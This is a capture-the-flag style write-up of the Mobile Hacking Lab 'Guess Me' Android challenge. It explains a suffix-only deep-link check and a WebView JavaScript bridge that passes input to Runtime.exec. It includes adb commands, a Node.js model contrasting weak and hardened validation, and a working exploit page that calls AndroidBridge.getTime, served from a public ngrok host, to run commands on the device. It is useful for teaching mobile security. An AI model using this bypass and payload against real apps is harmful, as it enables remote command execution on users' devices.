Guess me
Hello everyone. In this blog post I will walk through my solution steps for the Guess Me challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.
Let's install the app and open it. It is a guessing game: the app picks a random number and you win when you guess it correctly.
Analyzing the AndroidManifest.xml, we find two important activities: MainActivity and WebviewActivity, the latter reachable through a deep link that uses the mhl scheme.

Let's analyze the first one (MainActivity). It has three methods of interest:

- startNewGame(): generates a random secret number, resets the attempt counter to 0, displays an initial message and enables user input.
- validateGuess(): reads the user's input, compares it with the secret number and tells the user whether the guess is too high or too low; on a correct guess it shows a congratulations message, otherwise a failure message.
- enableInput()/disableInput(): toggle whether the user is allowed to type a guess.
Let's analyze the second one (WebviewActivity). It has the following methods of interest:

- onCreate(): enables JavaScript in the WebView and adds a JavaScript interface under the name AndroidBridge, the object name that page scripts use to call back into the app.
- isValidDeepLink(): accepts URLs whose scheme is mhl or https and whose host is mobilehackinglab. It also checks that the url query parameter ends with "mobilehackinglab.com". That is only a suffix check on the string, so any URL whose path or query ends with that text passes, regardless of the host it actually points to.
- MyJavaScriptInterface class:
  - loadWebsite(): takes a URL, checks that it is not null and loads it inside the WebView.
  - getTime(): takes a string and executes it as a system command via Runtime.getRuntime().exec(Time), reads the process output through a stream and returns it as text. Because the argument comes straight from JavaScript in the loaded page, this is a command-execution sink.
Let's test it using adb:

```bash
adb shell am start -n com.mobilehackinglab.guessme/.WebviewActivity -d "mhl://mobilehackinglab?url=https://google.com/mobilehackinglab.com"
```
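To make the weakness in isValidDeepLink() concrete, here is an added example (my own Node.js model, not the app's code) that reimplements the check as described above next to a hardened version that parses the url parameter and compares its hostname. The function names, the exact rules and the sample links, including the attacker.example host, are assumptions for illustration:

```javascript
// Added example: Node.js model of the deep-link validation described in
// the write-up. NOT the app's own code; function names, exact rules and
// sample links are assumptions used to show why the filter is bypassable.

const ALLOWED_SCHEMES = new Set(["mhl:", "https:"]);
const ALLOWED_HOST = "mobilehackinglab";

// Weak check, as described: scheme mhl or https, host "mobilehackinglab",
// and the `url` query parameter merely has to END WITH "mobilehackinglab.com".
function isValidDeepLinkWeak(link) {
  let u;
  try { u = new URL(link); } catch { return false; }
  if (!ALLOWED_SCHEMES.has(u.protocol) || u.hostname !== ALLOWED_HOST) return false;
  const target = u.searchParams.get("url");
  return target !== null && target.endsWith("mobilehackinglab.com");
}

// Hardened variant: parse the `url` parameter as a URL of its own, insist on
// https, and compare its hostname exactly (or as a subdomain). An attacker can
// put "mobilehackinglab.com" in the path or query of their own server, but
// cannot make their hostname match.
function isValidDeepLinkHardened(link) {
  let u;
  try { u = new URL(link); } catch { return false; }
  if (!ALLOWED_SCHEMES.has(u.protocol) || u.hostname !== ALLOWED_HOST) return false;
  const raw = u.searchParams.get("url");
  if (raw === null) return false;
  let t;
  try { t = new URL(raw); } catch { return false; }
  const host = t.hostname.toLowerCase();
  return t.protocol === "https:" &&
    (host === "mobilehackinglab.com" || host.endsWith(".mobilehackinglab.com"));
}

// Constructed sample links; attacker.example is a placeholder host.
const SAMPLES = {
  legit: "mhl://mobilehackinglab?url=https://www.mobilehackinglab.com",
  pathTrick: "mhl://mobilehackinglab?url=https://google.com/mobilehackinglab.com",
  queryTrick: "mhl://mobilehackinglab/?url=https://attacker.example/exploit.html?mobilehackinglab.com",
  wrongHost: "mhl://evil?url=https://mobilehackinglab.com",
};

// Returns the verdict of both checks for one link.
function evaluate(link) {
  return { weak: isValidDeepLinkWeak(link), hardened: isValidDeepLinkHardened(link) };
}

for (const [name, link] of Object.entries(SAMPLES)) {
  console.log(name.padEnd(11), JSON.stringify(evaluate(link)));
}
```

Run it with `node`: the weak check accepts both the path trick and the query trick (the shape used in the exploit below), while the hardened check accepts only the link whose url parameter really points at mobilehackinglab.com.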
The validation passes and the page loads in the WebView. Now we can call the methods of the MyJavaScriptInterface class from the page's JavaScript: we write a malicious page that calls getTime() with a system command as its argument, host it on a public server and load it through the deep link to achieve RCE.

```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
  <p id="result">Thank you for visiting</p>
  <!-- Hyperlink whose onclick triggers the bridge call -->
  <a href="#" onclick="executeCommand()">Execute Command</a>
  <script>
    function executeCommand() {
      try {
        // AndroidBridge is the JavaScript interface name registered by the app;
        // getTime() passes its argument to Runtime.exec() and returns the output.
        var result = AndroidBridge.getTime("whoami");
        var lines = result.split('\n');
        var timeVisited = lines[0];
        var fullMessage = "Command: " + timeVisited;
        document.getElementById('result').innerText = fullMessage;
        // Redirect afterwards so the page looks legitimate
        window.location.href = "https://www.mobilehackinglab.com/";
      } catch (e) {
        console.error("Error calling getTime:", e);
      }
    }
  </script>
</body>
</html>
```
Let's deliver this exploit with adb. The url parameter points at our public server and ends with "mobilehackinglab.com" (as a bogus query string), which is all isValidDeepLink() requires:

```bash
adb shell am start -W -a android.intent.action.VIEW -d "mhl://mobilehackinglab/?url=https://104a-156-203-231-227.ngrok-free.app/exploit.html?mobilehackinglab.com"
```

The page loads in the WebView, and clicking Execute Command runs whoami on the device through AndroidBridge.getTime(): we have RCE.